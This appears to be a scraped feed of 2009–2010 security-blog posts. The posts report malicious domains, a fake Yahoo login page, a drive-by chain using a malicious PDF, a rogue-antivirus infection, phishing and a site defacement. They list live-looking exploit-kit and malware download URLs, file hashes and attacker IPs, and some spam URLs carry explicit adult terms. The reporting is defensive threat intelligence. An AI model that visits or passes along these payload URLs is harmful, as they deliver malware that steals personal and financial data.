/>glb-consulting.com<br />gobelincouture.com<br />hdriltd.com<br />hhs.hu<br />hidrotech.net<br />hipi.hu<br />icup2008.com<br />immo-balaton.hu<br />jogtorte.net<br />karos.net<br />karosinfo.hu<br />kegyelet.com<br />kehidaingatlan.com<br />kopet2000.hu<br />kormanymu.com<br />kovatsits.com<br />landceramic.com<br />lyra.hu<br />medgyesi.com<br />mesefigurasfalfestes.hu<br />moneysavinghomepage.com<br />motocomic.com<br />motocomics.com<br />mugyujtokejszakaja.hu<br />multitiersolution.com<br />napfurdo.com<br />narc.hu<br />netpatika.net<br />nyugat-balaton.com<br />ocipe.hu<br />operett.com<br />orvosok.com<br />osztalykirandulas.com<br />ouraborus.com<br />palmbeach.hu<br />pap-sziget.hu<br />papirtaska.com<br />peg.hu<br />peterbertalan.com<br />pingwinet.hu<br />previewfiction.com<br />primadentplus.com<br />probiotikum.com<br />pusztacaccia.com<br />rokfort.net<br />rozsdamentes.com<br />s2.webtar.hu<br />scatoli.it<br />servosteuerung.com<br />shiatsu.hu<br />sikerakademia.eu<br />studium-nyelviskola.hu<br />sunsetdesign.net<br />szabb.com<br />szabofolia.com<br />szalanczy.com<br />szamitastechnika.net<br />szelidi-to.hu<br />szentorban.com<br />szigetkozkft.hu<br />szogyenyi.hu<br />szoroban.com<br />szuperdomain.com<br />szurkepuli.hu<br />temeto.com<br />thegameman.net<br />torellas-art.com<br />toys-port.com<br />trailerfiction.com<br />trioajto.hu<br />turak.hu<br />tuzoltosag-pomaz.hu<br />uniqa-ep.hu<br />utszoroso.hu<br />vadkert.hu<br />vagyonbiztonsag.hu<br />vasipar.hu<br />vecsei.net<br />virtualceramic.com<br />virtualceramicmarket.com<br />virtualceramicshop.com<br />virtualtilemarket.com<br />warhammer.hu<br />worldceramicmarket.com<br />worldceramicshop.com<br />www.bekecsaba.hu<br />www.hipi.hu<br />xn--szmtstechnika-4dbc4q.net<br />zclubhungary.hu<br /><br /><br />83.245.63.121<br />*.crayodyne.com<br />1vending.com<br />888bootcamp.com<br />adapa.si<br />adswebprint.com<br />albanyassociates.com<br />alexbatty.net<br />ambadyconstructions.com<br />arevelation.com<br />artisshock.com<br />atraktos.com<br />autosbondia.com<br />aytugondes.com<br />badboyzevent.com<br />bankcottage-guesthouse.com<br />bcbrit.net<br />bersy.it<br />bettingleague.net<br />burglar-alarms.net<br />caravans-for-sale.com<br />carpetcleaningservice.net<br />cavershamafc.com<br />cbjcolo.net<br />chezvouspc.com<br />chezvouspc.net<br />chrixkit.net<br />clayhallosteopaths.com<br />clearwaybuilder.com<br />corporate-entertainment1.com<br />crayodyne.com<br />darranwilliams.net<br />devdos.com<br />directcorsica.com<br />dragonred.com<br />ecituk.com<br />eniana.com<br />epools.net<br />equinetourism.com<br />eventfirstaidservices.com<br />flowerglow.com<br />fountainfineart.com<br />fridaykhutbah.net<br />friendly-places.com<br />garethmoore.net<br />geaweb.com<br />globalsurfari.com<br />harchester.net<br />harrybeckers.com<br />helmdevelopment.net<br />hintkumasi.com<br />http.lithium.lon.periodicnetwork.com<br />inplates.com<br />inspiredhf.com<br />intelly.net<br />jedocomputers.com<br />kallkwikbirmingham.com<br />kenmackenzie.com<br />kentishgraphics.com<br />keywebdesign.net<br />kineticnorth.com<br />kitchendeepclean.com<br />lainy.net<br />leafgreendisplays.com<br />leehenrymusic.com<br />legalexplus.com<br />leisuremaintenance.com<br />lestudiofitness.com<br />letshaveaholidayinspain.com<br />lordkrishnabuilders.com<br />luv4food.net<br />mail.atraktos.com<br />mail2b.atraktos.com<br />mannmachine.com<br />mantova.net<br />maplemole.net<br />marcophones.com<br />mbunit.com<br />mechalift.com<br />melankolik.com<br />mgvenice.com<br />miczakbuilders.com<br />mor-design.co.uk<br />motorhomes-for-sale.com<br />mumsbymaria.com<br />mysticfamiliar.com<br />newtbeerfest.com<br />nijigenki.com<br />nijiworld.com<br />orkconsult.com<br />parkhomes-for-sale.com<br />payroling.com<br />pierresmulders.com<br />pro-testing.com<br />profecole.com<br />rauncharoo.com<br />rooswinkel.net<br />saleel.net<br />selenoi.net<br />silksoflondon.net<br />smilescool.com<br />smulders.be<br />southsidemag.net<br />spanish-owners-direct.com<br />starbicpay.com<br />stayaerusa.com<br />stayaerusa.net<br />strategic-investment.com<br />swsdental.net<br />swsdiamonds.net<br />swsrotary.com<br />swsrotary.net<br />texasa1.com<br />thairealm.com<br />toolrepairservices.com<br />turveys.com<br />wg7.net<br />wh6.net<br />wheretoonow.net<br />wind-academy.net<br />www.croydoncar.com<br />www.bersy.it<br />xa2.net<br /><br /><br /><br />65.98.67.74<br />alkayagnik.co.in<br />bondre.in<br /><br />217.195.204.242<br />www.nicaea.com.tr<br /><br /><br />160.217.96.2<br />home.pf.jcu.cz<br /><br /><br />124.248.32.48<br />oneinfintyx.eu<br /><br />208.109.138.73<br />www.sgftv.com<br /><br />72.167.131.159<br />www.mangeshraut.com<br /><br />207.210.80.250<br />5-porn.com<br /><br /><br />Dead domains:<br /><br />www.fuckbook-CABALLERO.com<br />www.omvouxylqe.com<br />40cdc69e1ecb.yepawobat.cn<br />341a20db.nihaguzac.cn<br />31d.dupesezew.cn<br />58bb1.hecovujal.cn<br />2ea1ed64c.rebatezur.cn<br />5f88.foledikin.cn<br />c7344.wuvoqafaq.cn<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-3140888977125348389?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/BMHiOkcFFrwhfgmZAb_QyFROXgw/0/da"><img src="http://feedads.g.doubleclick.net/~a/BMHiOkcFFrwhfgmZAb_QyFROXgw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/BMHiOkcFFrwhfgmZAb_QyFROXgw/1/da"><img src="http://feedads.g.doubleclick.net/~a/BMHiOkcFFrwhfgmZAb_QyFROXgw/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2010/01/spam-10-jan-10.htmltag:blogger.com,1999:blog-2992238913899645252.post-68530709182728305192010-01-02T01:38:00.000-08:002010-01-21T02:40:19.703-08:002010-01-21T02:40:19.703-08:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/Sz8UybyP60I/AAAAAAAAA6o/xX97CUdMpeM/s1600-h/yahooinvisible1.PNG"><img style="cursor: pointer; width: 320px; height: 243px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/Sz8UybyP60I/AAAAAAAAA6o/xX97CUdMpeM/s320/yahooinvisible1.PNG" alt="" id="BLOGGER_PHOTO_ID_5422075333061897026" border="0" /></a><br /><br />Don't be fool to login to this kind or similar fake yahoo websites. Change the yahoo password immediately once you fall to this kind of trick campaign. :)<br /><br />www.4detector.info (97.74.144.151)<br /><br />Domains sharing the same IP address:<br /><br />skatesquad.com<br />sunrise.redearthdesign.com<br />texasbirds.org<br />thehowlands.net<br />therightopportunity.com<br />thiellsfd.com<br />vbsvirtualassist.com<br />virginia-beach-attorney.com<br />vita-land.com<br />wearevictory.com<br />webshire.net<br />www.97bi.com<br />www.allsesso.com<br />www.baiduxbaidu.info<br />www.bestelderlyproducts.com<br />www.billiard-tours.com<br />www.blogadmonkey.com<br />www.bugattiescorts.com<br />www.ccmcinemas.com<br />www.couture-threads.com<br />www.dirking.info<br />www.ezejobs.com<br />www.gogobest.com<br />www.jack21.com<br />www.lasierranightclub.com<br />www.linkking.info<br />www.lucianvision.com<br />www.lunwencn.com<br />www.miamiartcontest.com<br />www.nofaultsports.com<br />www.peaveycorp.com<br />www.perfectpennystocks.com<br />www.politekstil.net<br />www.profsrch.com<br />www.qvisits.com<br />www.redearthdesign.com<br />www.runningwiththehorseman.com<br />www.sese2009.com<br />www.shopassignments.info<br />www.skatesquad.com<br />www.unmeteredhostingreview.com<br />www.vbsvirtualassist.com<br />www.virginia-beach-attorney.com<br />www.zetaplex.com<br />zeeone.com<br />zetaplex.com<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-6853070918272830519?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/yAyYIKhi-RlGvTilKKpYeUvfHuM/0/da"><img src="http://feedads.g.doubleclick.net/~a/yAyYIKhi-RlGvTilKKpYeUvfHuM/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/yAyYIKhi-RlGvTilKKpYeUvfHuM/1/da"><img src="http://feedads.g.doubleclick.net/~a/yAyYIKhi-RlGvTilKKpYeUvfHuM/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com1http://www.web2secure.com/2010/01/yahoo-invisible-accounts.htmltag:blogger.com,1999:blog-2992238913899645252.post-28365406799570070422009-12-29T07:25:00.001-08:002009-12-30T05:17:57.993-08:002009-12-30T05:17:57.993-08:00While searching some malicious footprint code from Google that showed as below. Lots of the malicious sites can be found from below codes.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/Szof99hsSWI/AAAAAAAAA6I/Rj26DbjBG9c/s1600-h/footprint.PNG"><img style="cursor: pointer; width: 320px; height: 35px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/Szof99hsSWI/AAAAAAAAA6I/Rj26DbjBG9c/s320/footprint.PNG" alt="" id="BLOGGER_PHOTO_ID_5420680250842171746" border="0" /></a><br /><br />One of the malicious site is porn site "teensxtube.com", you will notices that following internet connections were established.<br /><br />http://teensxtube.com/<br />http://teensxtube.com/wp.js<br />http://teensxtube.com/extra/sheduler.php<br />http://teensxtube.com/extra/count.php?gr=4<br />http://teensxtube.com/extra/count.php?gr=88<br />http://eccinput.com/rstat.htm<br />http://teensxtube.com/1.jpg<br />http://homesiteuk.com/index.php<br />http://eccinput.com/r/cnt-gif1x1.php?e=1600.1200&amp;d=32&amp;r=http%3A//teensxtube.com/&amp;p=http%3A//eccinput.com/rstat.htm&amp;t=<br />http://homesiteuk.com/x.x<br />http://homesiteuk.com//load.php?spl=mdac (<a href="http://www.virustotal.com/analisis/6d8909bacb1f4c00daf8c6ade7dab66f4ba6101ef426ee60de08de7e2c8df6f5-1262084917">VT</a> 5/41); <a href="http://www.threatexpert.com/report.aspx?md5=f594701a967c5512b67ef30bb287a8a9">ThreatExpert Report</a><br />http://homesiteuk.com/index.php?spl=2&amp;br=MSIE&amp;vers=6.0&amp;s=<br />http://homesiteuk.com//pdf.php<br />http://homesiteuk.com/index.php?spl=3&amp;br=MSIE&amp;vers=6.0&amp;s=<br />http://saloongins.net/nop/tds2.php<br />http://autouploaders.net/mass/tds2.php<br />http://settopworld.net/incallspa.php<br />http://greatinstant.net/yourseekerz.php<br />http://getgreatguide.in/s/exx.php<br />http://promotds.com/in.cgi?16<br />http://promotds.com/in.cgi?6<br />http://trenublo.com/estplanete.php<br />http://getgreatguide.in/search.php?qq=young%20tight%20ass<br />http://teenbestmovie.com/pi.php<br />http://getgreatguide.in/s/exx.php<br />http://getgreatguide.in/search.php?qq=allure%20amateur%20paige<br />http://getgreatguide.in/search.php?qq=lesbian%20teen%20site%20myspace%20com<br />http://fuckthisteen.net/pi.php<br />http://teenbestmovie.com/index2.php<br />http://fuckthisteen.net/index2.php<br />http://bestwebtop.net/estvirtuel.php<br />http://getgreatguide.net/s/exx.php<br />http://www.unseencontent.com/<br />http://www.unseencontent.com/cgi-bin/atx/out.cgi?l=o<br />http://213.174.143.196/v/cj.php?d=80<br />http://topfuckmovies.net/<br />http://greattaby.com/addlinkworld.php<br />http://findyourlink.net/s/exx_new.php<br />http://findyourlink.net/search.php?qq=free%20gay%20guy%20sex%20video<br />http://fuckthisteen.net/out.php?t=3.0.2.178&amp;url=http://www.campsnatch.com/hosted/index.php?ws/valik/teenybopperclub_mov500&amp;s=2<br />http://cafebarplaza.cn/mostextra.php<br />http://tofindhomes.in/s/exx.php<br />http://tofindhomes.in/se.php?qq=hardcore%20big%20dick%20sex<br />http://settopworld.net/greattab.php<br />http://themiddel.com/s/exx.php<br />http://themiddel.com/search.php?qq=buy+soma+online<br />http://greatinstant.net/therealabc.php<br />http://themiddel.com/s/exx.php<br />http://themiddel.com/search.php?qq=buy+lipitor<br />http://trenublo.com/topext.php<br />http://findyourlink.net/s/exx_new.php<br />http://findyourlink.net/search.php?qq=cock%20first%20her%20massive<br />http://navigateguide.com/s/exx_new.php<br />http://navigateguide.com/search.php?qq=ebony%20free%20model%20pic%20woman<br />http://adprotraffic.com/asm.js?id=22592<br /><br /><br />http://homesiteuk.com//pdf.php, below is the decoded stream that captured from malicious pdf.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/SztRePcjyzI/AAAAAAAAA6Y/cWoiBvAM9sE/s1600-h/1stlayer.PNG"><img style="cursor: pointer; width: 320px; height: 189px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/SztRePcjyzI/AAAAAAAAA6Y/cWoiBvAM9sE/s320/1stlayer.PNG" alt="" id="BLOGGER_PHOTO_ID_5421016156454767410" border="0" /></a><br />Seem like there have another layer code that need to decode. Without no surprising, you will get the actual codes after replacing "<span style="font-weight: bold;">kru pop 32</span>" with "<span style="font-weight: bold;">%</span>".<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SztReVWHFiI/AAAAAAAAA6g/eLukTuSS37Q/s1600-h/newPlayer.PNG"><img style="cursor: pointer; width: 320px; height: 189px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SztReVWHFiI/AAAAAAAAA6g/eLukTuSS37Q/s320/newPlayer.PNG" alt="" id="BLOGGER_PHOTO_ID_5421016158038332962" border="0" /></a><br />Obviously, analyst will get Unicode after decode using method UCS. http://homesiteuk.com//load.php?spl=pdf_0day<br /><br />According to <a href="http://www.threatexpert.com/report.aspx?md5=f594701a967c5512b67ef30bb287a8a9">ThreatExpert</a>, this malware categorized as Trojan Dropper and have Zbot characteristic. It will stole personal information and financial information. Besides that, it also generates lots traffics out to other porn websites.<br /><br />Following generated connections:<br /><br />autouploaders.net<br />saloongins.net<br />settopworld.net<br />greatinstant.net<br />trenublo.com<br />bestwebtop.net<br />greattaby.com<br />cafebarplaza.cn<br />discoverany.cn<br />d45648675.cn<br />moretds.in<br /><br />From the malicious crafted pdf file, there have interesting that I noticed is about "<span style="font-weight: bold;">/Author (Miekiemoes)</span>"<br /><br />Miekiesmoes is Assistant Director of Research @ Malwarebytes according from <cite><b>miekiemoes</b>.blogspot.com</cite><br /><cite><br /></cite><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/Szoo7HUeXcI/AAAAAAAAA6Q/rejkwUoHB5A/s1600-h/Miekiemoes.PNG"><img style="cursor: pointer; width: 320px; height: 293px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/Szoo7HUeXcI/AAAAAAAAA6Q/rejkwUoHB5A/s320/Miekiemoes.PNG" alt="" id="BLOGGER_PHOTO_ID_5420690097536130498" border="0" /></a><br /><br />Seem like someone is joking with her! :-)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2836540679957007042?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/VV1hia7_7ZQHIIeIbOnzug4rDQo/0/da"><img src="http://feedads.g.doubleclick.net/~a/VV1hia7_7ZQHIIeIbOnzug4rDQo/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/VV1hia7_7ZQHIIeIbOnzug4rDQo/1/da"><img src="http://feedads.g.doubleclick.net/~a/VV1hia7_7ZQHIIeIbOnzug4rDQo/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/miekiesmoes-named-in-malicious-crafted.htmltag:blogger.com,1999:blog-2992238913899645252.post-90288952335281471222009-12-23T06:29:00.000-08:002009-12-23T07:40:27.257-08:002009-12-23T07:40:27.257-08:00Visiting compromised website with vulnerable IE browser end with rogue anti-virus installed in my virtual systems. As usual, rouge anti-virus will perform scanning on systems with alerting with fake messages, and end up users tricked to purchase rouge anti-virus online.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzI3k0oGr-I/AAAAAAAAA6A/szz8-FfRVZs/s1600-h/hidecodes.PNG"><img style="cursor: pointer; width: 320px; height: 167px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzI3k0oGr-I/AAAAAAAAA6A/szz8-FfRVZs/s320/hidecodes.PNG" alt="" id="BLOGGER_PHOTO_ID_5418454407421800418" border="0" /></a><br /><br />Will redirecting to "sodanthu.com/in6.php"<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/SzIp7jcuNBI/AAAAAAAAA5g/CDMmRlB6gxo/s1600-h/SecurityTool.PNG"><img style="cursor: pointer; width: 320px; height: 239px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/SzIp7jcuNBI/AAAAAAAAA5g/CDMmRlB6gxo/s320/SecurityTool.PNG" alt="" id="BLOGGER_PHOTO_ID_5418439404784858130" border="0" /></a><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzIp8wdY29I/AAAAAAAAA5w/Ay0H-avZtLQ/s1600-h/alert2.PNG"><img style="cursor: pointer; width: 320px; height: 270px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzIp8wdY29I/AAAAAAAAA5w/Ay0H-avZtLQ/s320/alert2.PNG" alt="" id="BLOGGER_PHOTO_ID_5418439425457183698" border="0" /></a><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzIp8a42JfI/AAAAAAAAA5o/pwV2Lxu91cQ/s1600-h/alert1.PNG"><img style="cursor: pointer; width: 320px; height: 142px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzIp8a42JfI/AAAAAAAAA5o/pwV2Lxu91cQ/s320/alert1.PNG" alt="" id="BLOGGER_PHOTO_ID_5418439419666769394" border="0" /></a><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzIp9UTEipI/AAAAAAAAA54/CiDDx_VoiXU/s1600-h/SecurityToolPur.PNG"><img style="cursor: pointer; width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzIp9UTEipI/AAAAAAAAA54/CiDDx_VoiXU/s320/SecurityToolPur.PNG" alt="" id="BLOGGER_PHOTO_ID_5418439435077585554" border="0" /></a><br /><br />Few domains and IP address used to download the payloads:<br />sodanthu.com - 76.186.201.167<br />domoktov.com - 122.115.63.19<br />bodyscanfit.com - 95.143.192.197<br />93.178.16.243<br />67.8.103.165<br />115.23.132.150<br />72.189.62.203<br />remotepaybill.com - 72.233.65.202<br />58.180.228.103<br />noloid.com - 82.38.177.107<br /><br />Basically there have two executable payload files downloaded with low that AV detection rate.<br />- load.exe 11/40 (sha1:f1b4fc1e56c9e129e83f3139b54dc9b26c481769) <a href="http://www.virustotal.com/analisis/a13bc73f217562be2cb7a59da93eeb668c96ce36ff9f5873dbd01b59f024%20%206862-1261559599">VT</a> , <a href="http://www.threatexpert.com/report.aspx?md5=f7596f6404837238c9bcd09a2dbaec1d">ThreatExpert</a><br />- 78_wcap.exe 16/40 (sha1:a142cb266ad6cd764501981f6bb194025b7c8cc8) 78_wcap.exe <a href="http://www.virustotal.com/analisis/0b7999c0e10ec11e942d1e757a8d45285c2a5e9362831be92a5c0060f2fd%20%20f87c-1261559687">VT</a>, <a href="http://www.threatexpert.com/report.aspx?md5=ab585c87652c933f82bbaddfd52ea15d">ThreatExpert</a><br /><br />"load.exe" starting request to download another two payloads from following urls:<br />- http://95.211.8.217/pr/pic/test_vorogpa_b.exe (Netherlands)<br />- http://213.108.56.140/pr/pic/mode.exe (Russian Federation)<br /><br />- test_vorogpa_b.exe 8/41 (sha1:77e476b0f93241d7fd4c96a93b2aaf51c0b7283c) <a href="http://www.virustotal.com/analisis/a644b510223b25837d6f512775ab279ad6b904c7e55ffe05c46115951b91%20%20bf85-1261566764">VT</a>, <a href="http://www.threatexpert.com/report.aspx?md5=3308fd479356a3d578728a270b44eeec">ThreatExpert </a><br />- mode.exe 8/41 (sha1:bd53d7a738a4eb7b208441772312c0a980f6c9d5) <a href="http://www.virustotal.com/analisis/0454cf200f24cb589dd7b2f995c695e2dcfaca546e1faa30e074ff546138%20%200d74-1261566864">VT</a>, <a href="http://www.threatexpert.com/report.aspx?md5=bf69df57b8b56a679c0b691ac208060b">ThreatExpert</a><br /><br /><br />Other than that, following Host Names were requested from host database:<br /><br />93.178.16.243 Saudi Arabia<br />99.172.145.27 United States<br />70.136.99.45 United States<br />58.180.228.103 Korea, Republic Of<br />69.133.52.228 United States<br />98.150.16.40 United States<br />116.32.243.20 Korea, Republic Of<br />121.133.154.145 Korea, Republic Of<br />65.36.21.142 United States<br />67.8.103.165 United States<br />68.63.4.110 United States<br />115.23.132.150 Korea, Republic Of<br />211.212.234.198 Korea, Republic Of<br />189.39.157.223 Brazil<br />72.189.139.203 United States<br />200.59.9.82 Argentina<br />119.207.4.172 Korea, Republic Of<br />115.136.188.114 Korea, Republic Of<br />221.161.156.247 Korea, Republic Of<br />72.189.62.203 United States<br />152.1.90.107 United States<br />86.104.133.94 Romania<br />67.191.95.170 United States<br />112.170.209.51 Korea, Republic Of<br />189.41.94.209 Brazil<br />221.145.69.122 Korea, Republic Of<br />82.139.32.75 Poland<br />210.96.149.10 Korea, Republic Of<br />89.33.184.138 Romania<br />114.42.119.236 Taiwan, Province Of China<br />220.88.62.193 Korea, Republic Of<br />112.164.231.195 Korea, Republic Of<br />67.66.92.186 United States<br />192.35.222.23 United States<br />98.239.53.112 United States<br />211.56.233.178 Korea, Republic Of<br />98.204.223.239 United States<br />92.100.238.0 Russian Federation<br />162.105.113.88 China<br />121.182.163.238 Korea, Republic Of<br />200.79.216.225 Mexico<br />98.225.215.185 United States<br />67.160.46.239 United States<br />89.110.12.115 Russian Federation<br />98.224.160.221 United States<br />97.85.189.53 United States<br />76.237.5.121 United States<br />58.168.116.29 Australia<br />76.179.11.105 United States<br />70.126.56.149 United States<br />193.151.59.190 Ukraine<br />200.7.166.145 Bolivia<br />24.92.178.72 United States<br />88.216.25.114 Lithuania<br />99.232.235.89 Canada<br />115.43.186.103 Taiwan, Province Of China<br />118.42.212.181 Korea, Republic Of<br />121.185.21.213 Korea, Republic Of<br />121.174.84.123 Korea, Republic Of<br />68.69.204.104 Canada<br />61.58.111.158 Taiwan, Province Of China<br />94.54.195.12 Turkey<br />201.13.94.177 Brazil<br />121.145.43.209 Korea, Republic Of<br />188.97.120.80 Germany<br />80.216.136.246 Sweden<br />85.67.63.112 Hungary<br />70.235.17.227 United States<br />221.143.60.99 Korea, Republic Of<br />87.7.150.120 Italy<br />193.110.77.60 Ukraine<br />93.80.33.215 Russian Federation<br />67.49.12.244 United States<br />121.1.71.38 Korea, Republic Of<br />87.10.29.149 Italy<br />121.159.139.134 Korea, Republic Of<br />84.125.210.129 Spain<br />125.178.173.231 Korea, Republic Of<br />93.126.104.158 Ukraine<br />128.130.56.33 Austria<br />129.22.80.237 United States<br />220.116.89.236 Korea, Republic Of<br />24.42.76.57 United States<br />98.30.33.240 United States<br />84.3.94.38 Hungary<br />121.164.68.74 Korea, Republic Of<br />24.132.52.67 Netherlands<br />83.85.192.248 Netherlands<br />70.121.202.156 United States<br />64.246.85.154 United States<br />67.187.153.18 United States<br />98.240.224.97 United States<br />152.1.40.235 United States<br />79.9.35.42 Italy<br />69.204.254.166 United States<br />121.217.36.61 Australia<br />24.238.162.9 United States<br />121.128.195.90 Korea, Republic Of<br />109.60.245.57 Italy<br />119.64.109.187 Korea, Republic Of<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-9028895233528147122?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/pgyO-boaGiBZjnojjbC9WGJlBFw/0/da"><img src="http://feedads.g.doubleclick.net/~a/pgyO-boaGiBZjnojjbC9WGJlBFw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/pgyO-boaGiBZjnojjbC9WGJlBFw/1/da"><img src="http://feedads.g.doubleclick.net/~a/pgyO-boaGiBZjnojjbC9WGJlBFw/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/security-tool-rouge-antivirus.htmltag:blogger.com,1999:blog-2992238913899645252.post-34817622797842005282009-12-22T21:33:00.001-08:002009-12-22T21:38:26.719-08:002009-12-22T21:38:26.719-08:00World of Warcraft (WoW) players should be on the lookout for phishing sites trying to get their user info.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzGr6zRlUeI/AAAAAAAAA5Y/3smw3gJ8fMM/s1600-h/fakewow.PNG"><img style="cursor: pointer; width: 320px; height: 180px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzGr6zRlUeI/AAAAAAAAA5Y/3smw3gJ8fMM/s320/fakewow.PNG" alt="" id="BLOGGER_PHOTO_ID_5418300853388136930" border="0" /></a><br /><br />Becareful for this link..<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-3481762279784200528?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/KMjWrDbGSu3H1uo2Xz2wmkaOJUw/0/da"><img src="http://feedads.g.doubleclick.net/~a/KMjWrDbGSu3H1uo2Xz2wmkaOJUw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/KMjWrDbGSu3H1uo2Xz2wmkaOJUw/1/da"><img src="http://feedads.g.doubleclick.net/~a/KMjWrDbGSu3H1uo2Xz2wmkaOJUw/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/world-of-warcraft-phishing-website.htmltag:blogger.com,1999:blog-2992238913899645252.post-67715578113499395292009-12-22T03:01:00.000-08:002009-12-22T03:10:06.564-08:002009-12-22T03:10:06.564-08:00My reader sent me email to post regarding the defacement for the Metrolink.com.my, this website providing full range of property at Malaysia include Sale, Rent, Project Development Launching and etc.<br /><br />Before defaced:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/SzCoZwnR63I/AAAAAAAAA5I/T6X2FHAL4_8/s1600-h/metrolink-default.PNG"><img style="cursor: pointer; width: 320px; height: 250px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/SzCoZwnR63I/AAAAAAAAA5I/T6X2FHAL4_8/s320/metrolink-default.PNG" alt="" id="BLOGGER_PHOTO_ID_5418015512226556786" border="0" /></a><br /><br />After defaced:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzCos45CtFI/AAAAAAAAA5Q/8GSnJLYaTdU/s1600-h/metrolink.PNG"><img style="cursor: pointer; width: 320px; height: 224px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzCos45CtFI/AAAAAAAAA5Q/8GSnJLYaTdU/s320/metrolink.PNG" alt="" id="BLOGGER_PHOTO_ID_5418015840866055250" border="0" /></a><br /><br /><br />Thanks for my reader!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-6771557811349939529?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/qJlyKnL5E_Y0V1wXGEZ12RdcwdQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/qJlyKnL5E_Y0V1wXGEZ12RdcwdQ/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/qJlyKnL5E_Y0V1wXGEZ12RdcwdQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/qJlyKnL5E_Y0V1wXGEZ12RdcwdQ/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/malaysia-property-company-defaced.htmltag:blogger.com,1999:blog-2992238913899645252.post-80358515391371927812009-12-22T02:34:00.000-08:002009-12-22T03:01:41.712-08:002009-12-22T03:01:41.712-08:00Sudden death of Hollywood Celebrity's Brittany Murphy at age 32 during last weekend, really get bad guys interested to launch SEO poisoning at search result. This bad news really driving lots of users curiosity to become victim of scareware. Due to this incident, several articles regarding Brittany Murphy were posted by security vendors in their public blog.<br /><br />Wensense - <a href="http://securitylabs.websense.com/content/Alerts/3514.aspx">Brittany Murphy's Death SEO Poisoning</a><br />F-Secure - <a href="http://www.f-secure.com/weblog/archives/00001842.html">Brittany Murphy SEO</a><br />Trendmicro - <a 